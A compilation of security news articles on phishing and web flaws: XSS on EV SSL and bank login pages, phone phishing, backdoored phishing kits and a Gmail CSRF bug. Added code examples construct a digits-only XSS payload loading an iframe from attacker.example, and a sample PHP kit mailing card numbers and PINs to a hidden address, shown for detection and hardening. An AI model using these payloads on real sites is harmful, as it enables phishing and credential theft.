Extended Validation certificates and XSS considered harmful

A cross-site scripting vulnerability on the popular SourceForge.net website shows how Extended Validation SSL certificates could be exploited by fraudsters. A fraudster could piggyback on the extra trust an EV SSL certificate is meant to instil: arbitrary content injected into the secure page at SourceForge would make for a very convincing phishing attack. The green address bar displayed by the web browser would assure users that they are looking at a website that can be trusted, even though the page in front of them may contain scripts or HTML created by a remote attacker.

ie7-resized.png
The vulnerable page at SourceForge, showing the green address bar and injected JavaScript being executed

Extended Validation SSL certificates were originally created as a direct response to the rise in internet fraud, with additional verification processes reducing the likelihood of erroneously issuing a certificate to an unauthorised party. Modern web browsers treat EV SSL certificates differently from ordinary SSL certificates, typically turning the address bar green to show that a site can be trusted. Once users are conditioned into thinking that green means good, that conditioning becomes harmful when an EV SSL site contains a cross-site scripting vulnerability: the browser vouches for the certificate holder, not for the content of the page.

The number of EV SSL certificates in use worldwide is still relatively small and has only recently risen above 4,000. SourceForge is a large open source software development website, with a high ranking amongst users of the Netcraft Toolbar, and uses a VeriSign Class 3 Extended Validation SSL certificate for its main secure site at https://sourceforge.net.

firefox-small.png
Nightly builds of Firefox also display the green address bar element

Both Internet Explorer 7 and recent nightly builds of the Mozilla Firefox web browser display a green address bar when accessing the vulnerable page at SourceForge, even when the page is being used to inject content that may have been created by a fraudster. Netcraft has informed SourceForge about this issue, although the xssed.com mirror, where this vulnerability was first documented, suggests that it has remained unfixed since last year.

This discovery (believed to be the first documented case of XSS on an EV SSL website) highlights the need to remain wary of web application security, even when delivered with the most secure and trusted option of Extended Validation SSL certificates.

Netcraft offers extensive web application penetration and security testing services to identify vulnerabilities such as cross-site scripting.

Fraudster using phone numbers to receive authentication details

The Bank of Lancaster County is currently being targeted by a phishing attack that does away with the traditional web-based phishing forms. Instead, victims are asked to phone a toll free number to reactivate their card.

The scam is initiated by sending out phishing emails claiming that the victim's VISA card has been deactivated because it may have been used in illegal activities. Rather than clicking on a hyperlink and visiting a website to resolve the problem, victims are asked to call a phone number based in Erie, Pennsylvania. To add credibility to the attack, the email claims that the phone number is toll free, but it is not.

bankoflancaster.png

Stealing credentials via phone remains a relatively rare phishing technique. For scalability, attacks like these are usually carried out by sending emails rather than initiating phone calls, and request that the recipient calls a phone number which purportedly belongs to the bank.

Ironically, phone phishing could prove more effective due to the methods some banks use to combat fraud. Some make automated phone calls to cardholders in the event of suspicious transactions, with the cardholder being prompted to respond by entering personal details before confirming a transaction. In practice, the cardholder has no way of ascertaining that the phone call is really coming from their bank, and expecting the cardholder to trust the automated caller is effectively grooming the bank's customers into falling for phone based phishing attacks.

The Bank of Lancaster County has published an alert advising customers about fraudulent emails that contain phone numbers, which when called, ask for personal information including account passwords and credit card numbers.

Mr-Brain: Stealing Phish from Fraudsters

A persistent group of Moroccan fraudsters calling themselves Mr-Brain has launched a website dedicated to offering easy-to-use phishing site code, email templates and other hacking tools. The website offers phishing kits for many of the most common targets, such as Bank of America, eBay, PayPal and HSBC.

The tools and code provided by Mr-Brain are designed to make it extremely easy for other fraudsters to deploy realistic phishing sites. Only a very basic knowledge of programming is required to configure the PHP scripts to send victims' details to the fraudsters' chosen electronic mail address. Deploying one of these fully working kits can be done in as little as one minute – another factor that adds to their appeal.

Tricking the Fraudsters

Mr-Brain's intentions are to encourage as many people as possible to use their phishing kits, for all is not what it seems at first glance. Careful inspection of the configuration script reveals deceptive code that hides the true set of electronic mail addresses that are contacted by the kit – every fraudster who uses these kits will unwittingly send a copy of each victim's details back to the Mr-Brain group.

scam-pages.png

The configuration script exploits the case-sensitivity of PHP variable names to disguise Mr-Brain's electronic mail address as an unrelated but seemingly essential part of the script, encouraging fraudsters not to alter it. The injected electronic mail address is actually contained in a completely separate PHP file, where it is encrypted in a hidden input field named "niarB", or "Brain" backwards. Yet another PHP script reads the value from this input field and decrypts it before supplying it to the configuration script. Most fraudsters are unlikely to notice this level of obfuscation and will assume the script is working normally, since they also receive a copy of every email the script produces.

When Netcraft decrypted the contents, the hidden input field revealed one of Mr-Brain's Gmail addresses, which is used to covertly capture details from all of the phishing kits that have been deployed on their behalf by other fraudsters. A comment at the top of one of the scripts aims to deter these fraudsters from examining the script that decrypts the hidden field:

scam-pages3.png

Earlier this month, Netcraft also exposed a similar phishing scam targeting Bank of America. This, too, was authored by Mr-Brain and was configured to covertly send harvested credentials to a different Gmail address.

scam-pages2.png

Each phishing kit listed on their website is accompanied by a description, showing what kind of information it steals from victims. One page on their website lists a selection of Social Security numbers, credit card numbers and PINs under the heading "Free and Freash [sic] Credit Card".

Mr-Brain claims that all of the scam pages offered on its site are undetected by Mozilla, Opera and Internet Explorer. Netcraft blocks these sites when they are detected by the Netcraft Toolbar community, and propagates the block to all companies which license the Netcraft Phishing Site Feed.

Italian Bank’s XSS Opportunity Seized by Fraudsters

An extremely convincing phishing attack is using a cross-site scripting vulnerability on an Italian Bank's own website to attempt to steal customers' bank account details. Fraudsters are currently sending phishing mails which use a specially-crafted URL to inject a modified login form onto the bank's login page.

The vulnerable page is served over SSL with a bona fide SSL certificate issued to Banca Fideuram S.p.A. in Italy. Nonetheless, the fraudsters have been able to inject an IFRAME onto the login page which loads a modified login form from a web server hosted in Taiwan.

fideura.png
The fraudsters' login form presented inside the bank's SSL page.

This attack highlights the seriousness of cross-site scripting vulnerabilities on banking websites. It shows that security cannot be guaranteed just by the presence of "https" at the start of a URL, or checking that the browser address bar contains the correct domain name.

Cross-site scripting vulnerabilities on SSL sites also undermine the purpose of SSL certificates. While the attack detailed here injects external content via an IFRAME, a malicious payload could equally be delivered solely via the vulnerable GET parameter. In that case, any SSL certificate associated with the site, including an Extended Validation certificate, would display a padlock icon and apparently assure the user that the injected login form is genuine.

This particular attack is made all the more convincing by the vector used by the fraudsters: the URL employed by the attack injects a series of numbers directly into a JavaScript function call that already exists on the bank's LoginServlet page. This makes it difficult even for an experienced user to identify this as a cross-site scripting attack, as the URL does not look readily suspicious, with the injected content consisting only of numbers and commas.

fideura2.png
The vulnerable page, decoding arbitrary GET parameters.

In a possible attempt to bypass automated security filters, the injected content from Taiwan also contains encoded JavaScript which is used to display the text "Inserisci i tuoi codici personali" ("Insert your personal codes") and "per accedere alle aree riservate" ("To access all reserved areas"). When the modified form is submitted, the contents are transmitted to the Taiwanese server before the user is redirected to the bank's genuine, unaltered homepage.
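The vector described above, as an added example that is not the bank's code: a page function that already decodes a comma-separated list of character codes is turned into an HTML sink, so a URL containing nothing but digits and commas carries an IFRAME. The parameter name "msg", the path "LoginServlet" and the attacker host are assumptions; rendering is modelled as returning the HTML string so the example runs under Node without a browser.

```javascript
// Added example (not the bank's code). Models the numeric-only XSS vector
// and a hardened version of the same sink.

// A payload encoded as character codes: this is why the phishing URL "does
// not look readily suspicious" to an experienced user.
function encodeAsCodes(text) {
  return Array.from(text, (ch) => ch.charCodeAt(0)).join(',');
}

// Reconstruction of the pre-existing page function: it turns a list of
// numbers back into a string. On its own it is harmless.
function decodeCodes(param) {
  return param.split(',').map((n) => String.fromCharCode(Number(n))).join('');
}

// VULNERABLE: the decoded text reaches an HTML sink unchanged (in a browser
// this would be document.write or innerHTML).
function renderVulnerable(param) {
  return '<div id="msg">' + decodeCodes(param) + '</div>';
}

// HARDENED. Note that validating the parameter as numeric does NOT stop this
// attack, since the payload is all digits; what stops it is HTML-encoding
// the decoded text (or, in a browser, assigning it to textContent).
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => (
    { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]
  ));
}
function renderHardened(param) {
  if (!/^\d+(,\d+)*$/.test(param)) return '<div id="msg"></div>';
  return '<div id="msg">' + escapeHtml(decodeCodes(param)) + '</div>';
}

// Constructed attacker payload and the resulting phishing URL (assumed names).
const payload = '<iframe src="https://attacker.example/login.html"></iframe>';
const phishingUrl = 'https://bank.example/LoginServlet?msg=' + encodeAsCodes(payload);

console.log(phishingUrl);
console.log(renderVulnerable(encodeAsCodes(payload)));
console.log(renderHardened(encodeAsCodes(payload)));
```

The better fix is not to let a user-controlled parameter select page content at all, for instance by looking up a server-side message by identifier; the encoding step shown here is the minimum that keeps the existing function from becoming an injection point.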

Netcraft has contacted the bank affected by this attack and blocked the phishing site for all users of the Netcraft Toolbar, and propagated the block to the companies which license the Netcraft PhishFeed.

Phishing kits take advantage of novice fraudsters

A phishing kit targeting the Bank of America contains an interesting insight into the intellectual hierarchy involved in Internet fraud. At first glance, the phishing kit looks attractive to any fraudster: it is straightforward to deploy on any web server that supports PHP, and a single configuration file makes it easy to specify an electronic mail address to receive captured financial details. In addition to requesting credit card numbers and bank account details, a second form on the phishing site asks for the victim's SiteKey challenge questions and answers, which can help a fraudster gain access to the victim's Internet banking facilities.

bofa-config.png
The email address configured in the phishing kit.

However, while the phishing kit is easy to use, an encrypted component within the kit is used to send a copy of the captured details to an additional Gmail address, which belongs to the author. This will not be obvious to most fraudsters using the kit, as the relevant code is detached from the configuration file and is heavily obfuscated, requiring some effort to decode.

bofa-obfuscated.png
The obfuscated code which sends a copy of the financial details to the author.

Such deception is a useful tactic for any fraudster who wishes to maximize the number of successful attacks, as the work of deploying the phishing sites and sending the mails is then carried out free of charge by novice fraudsters on behalf of the author. This relieves the author of the burden of having to carry out the more time consuming aspects of phishing – finding bulletproof web hosting, hacking into host web sites, and sending millions of phishing mails – whilst benefiting by receiving mails from each and every deployment of their own phishing kit.
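The two backdoor tricks described in the Mr-Brain article above and in this Bank of America kit, a recipient hidden behind a variable that differs from the visible one only in case and a recipient carried in an encoded hidden form field, are the kind of thing a small triage script can surface. The following is an added example, not code from either kit. The sample kit it scans is constructed: the file names, variable names, the base64 encoding of the hidden field and the addresses are all assumptions, since the articles do not state how the real kits encode the address.

```javascript
// Added example (not the kits' code): triage of a phishing kit for hidden
// second recipients. The kit below is constructed for the demonstration.

const HIDDEN_ADDRESS = 'mr-brain@example.com'; // constructed, not a real address

const SAMPLE_KIT = {
  'config.php': `<?php
// ==== EDIT YOUR EMAIL HERE ====
$send = "novice-fraudster@example.com";
// ==== DO NOT EDIT BELOW (required by the script) ====
include("Pages/niarB.php");
$Send = niarB_decode($_POST["niarB"]);
$msg = "Card: " . $_POST["card"] . " PIN: " . $_POST["pin"];
mail($send, "BoA Result", $msg);
mail($Send, "BoA Result", $msg);
?>`,
  'Pages/niarB.php': `<?php
// this file is part of the spam filter bypass, leave it alone
function niarB_decode($v) { return base64_decode($v); }
?>`,
  'login.html': `<form method="POST" action="config.php">
<input type="text" name="card">
<input type="password" name="pin">
<input type="hidden" name="niarB" value="${Buffer.from(HIDDEN_ADDRESS).toString('base64')}">
<input type="submit" value="Continue">
</form>`,
};

const EMAIL_RE = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;

// Variables whose names collide once lower-cased: $send and $Send read as one
// setting to a hurried eye but are two distinct variables in PHP.
function findCaseVariantVariables(php) {
  const byLower = new Map();
  for (const m of php.matchAll(/\$([A-Za-z_]\w*)/g)) {
    const key = m[1].toLowerCase();
    const set = byLower.get(key) || new Set();
    set.add(m[1]);
    byLower.set(key, set);
  }
  return [...byLower.values()].filter((s) => s.size > 1).map((s) => [...s].sort());
}

// The first argument of every mail() call, i.e. each recipient expression.
// More than one call with different recipients is the pattern to look for.
function findMailRecipients(php) {
  return [...php.matchAll(/\bmail\s*\(\s*([^,]+),/g)].map((m) => m[1].trim());
}

// Hidden inputs, with a base64 decode attempt. A hidden field whose decoded
// value is an email address is exactly what the kit's "user" is not meant to see.
function findHiddenInputs(html) {
  const out = [];
  for (const m of html.matchAll(/<input[^>]*type="hidden"[^>]*>/gi)) {
    const name = (m[0].match(/name="([^"]*)"/) || [])[1];
    const value = (m[0].match(/value="([^"]*)"/) || [])[1] || '';
    let decoded = null;
    if (/^[A-Za-z0-9+/]+=*$/.test(value)) {
      const d = Buffer.from(value, 'base64').toString('utf8');
      if (EMAIL_RE.test(d)) decoded = d;
    }
    out.push({ name, value, decoded });
  }
  return out;
}

// Walk every file in the kit and collect the three indicators.
function triageKit(files) {
  const report = { caseVariants: [], recipients: [], hiddenInputs: [] };
  for (const [name, src] of Object.entries(files)) {
    if (name.endsWith('.php')) {
      report.caseVariants.push(...findCaseVariantVariables(src).map((v) => ({ file: name, names: v })));
      report.recipients.push(...findMailRecipients(src).map((r) => ({ file: name, expr: r })));
    } else {
      report.hiddenInputs.push(...findHiddenInputs(src).map((h) => ({ file: name, ...h })));
    }
  }
  return report;
}

const REPORT = triageKit(SAMPLE_KIT);
console.log(JSON.stringify(REPORT, null, 2));
```

Against the constructed kit the report shows two mail() recipients, a $send/$Send pair in config.php, and a hidden "niarB" field that decodes to an address. Real kits will use other encodings than base64; the decode step is the place to add them.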

bofa-screenshot.png
The phishing kit in action.

Google Fixes Gmail Cross-site Request Forgery Vulnerability

Google has fixed a vulnerability in their Gmail web based email service which would have allowed internet attackers to steal mail messages from users without being noticed.

The attack works by forcing a logged-in user to add a mail filter to their Gmail account, thereby allowing their mail to be forwarded to an external mail address controlled by the attacker. Because the Gmail service did not adequately verify the origin of such requests, it was possible for attackers to create their own web pages that used JavaScript to automatically make such requests on behalf of their victims. In essence, a Gmail user would visit one of these pages and have their account compromised without necessarily realising anything is awry. Only close inspection of the Filters tab in the Gmail Settings menu would reveal what had happened.

gmail.png

Proof of concept exploits used JavaScript to make a silent POST request to the Gmail service and add the attacker's filter. With the results of the request hidden in an iframe, it is highly unlikely that a victim would notice that their Gmail account had been compromised, particularly while they are browsing a completely different website. While this attack scenario would only be successful if the victim was logged in, many Gmail users remain constantly logged in throughout the day, thus increasing the likelihood of a successful attack.

The technique used by this exploit is known as CSRF (Cross-site Request Forgery) and is becoming an increasingly common method to attack web applications. If a web application is vulnerable to CSRF, it will allow unauthorised attackers to carry out arbitrary actions in the context of an authorised, logged in user of the application. Not only does this make a hacker’s life easier, but it also helps them to cover up their tracks, as malicious actions will appear to be carried out, unwittingly, by authorised users of the system.

Compromised webmail accounts are regarded as a valuable commodity by hackers, as they often contain information that would allow an attacker to gain unauthorised access to other systems, such as internet banking, and to harvest credit card details from online stores used by the victim. Because the attacker is now effectively in control of their victim’s email, they could also attack other accounts belonging to the victim by following “forgotten password” links and obtaining the relevant passwords via email.

Cross-site Request Forgery vulnerabilities are often difficult to identify using automated tools and typically require testing by security aware developers.